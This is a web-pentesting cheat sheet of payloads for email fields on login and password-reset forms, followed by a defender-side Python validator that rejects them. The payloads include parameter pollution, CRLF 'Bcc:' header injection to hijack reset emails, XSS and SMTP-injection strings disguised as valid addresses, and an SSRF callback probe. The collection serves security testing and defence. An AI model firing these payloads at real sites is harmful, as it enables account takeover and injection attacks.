Email Address Forms
How to exploit login and forgotten password forms.
Email Address Form Payloads
The following payloads can be used when attempting to exploit an email address form.
Param Manipulation and CRLF Injection
Use these payloads to try to force the web application to send legitimate password reset emails (and similar messages) to an email address you control:
{"email":"[email protected]","email":"[email protected]"}
{"email":["[email protected]","[email protected]"]}
[email protected]%0D%0ABcc:[email protected]
Other checks (XSS, SSRF, SMTP Manipulation)
Use these payloads (all of which are valid email addresses according to the RFC) to find other issues:
<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"[email protected]\r\nRCPT TO:<victim+"@test.com>
test@[burpcollab.com]
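As an added example, not from the original page: a defender-side check for a password-reset handler that rejects the parameter-pollution, CRLF and exotic-syntax payloads listed above. The function names and the strict address pattern are assumptions of this example; the pattern is deliberately narrower than RFC 5322, because a reset form has no need for quoted local-parts, comments or IP-literal domains.

```python
import json
import re
from typing import Optional

# Assumption of this example: a plain "local@domain.tld" shape only. Quoted local-parts,
# parenthesised comments, bracketed IP literals and angle brackets are all rejected,
# which removes the syntax the XSS/SSRF/SMTP payloads above depend on.
_STRICT_ADDRESS = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$"
)

# Characters that can never appear in an address we are willing to put in a mail header.
_FORBIDDEN = "\r\n\t <>()[]\"\\,;"


def _reject_duplicate_keys(pairs):
    """json.loads hook: fail closed when a JSON object repeats a key (e.g. two "email" members).

    The default decoder silently keeps the last value, which is what parameter pollution relies on.
    """
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate key: {key!r}")
        seen[key] = value
    return seen


def validate_recipient(address: str) -> Optional[str]:
    """Return a normalised single address, or None if it is not a plain, header-safe address."""
    if any(ch in address for ch in _FORBIDDEN):
        return None  # covers CRLF header injection and all bracket/quote/comment forms
    if not _STRICT_ADDRESS.fullmatch(address):
        return None
    return address.lower()


def parse_reset_request(raw_body: str) -> Optional[str]:
    """Extract the single recipient from a JSON reset-request body, or None if anything is off."""
    try:
        body = json.loads(raw_body, object_pairs_hook=_reject_duplicate_keys)
    except ValueError:  # malformed JSON or a duplicated key
        return None
    if not isinstance(body, dict):
        return None
    email = body.get("email")
    if not isinstance(email, str):  # a list of addresses is not one recipient
        return None
    return validate_recipient(email)
```

Run the three request-body payloads and the five address payloads from this page through these functions: the duplicated key, the array, the CRLF/Bcc address and every bracketed or quoted form come back as None, while an ordinary address is accepted and lower-cased.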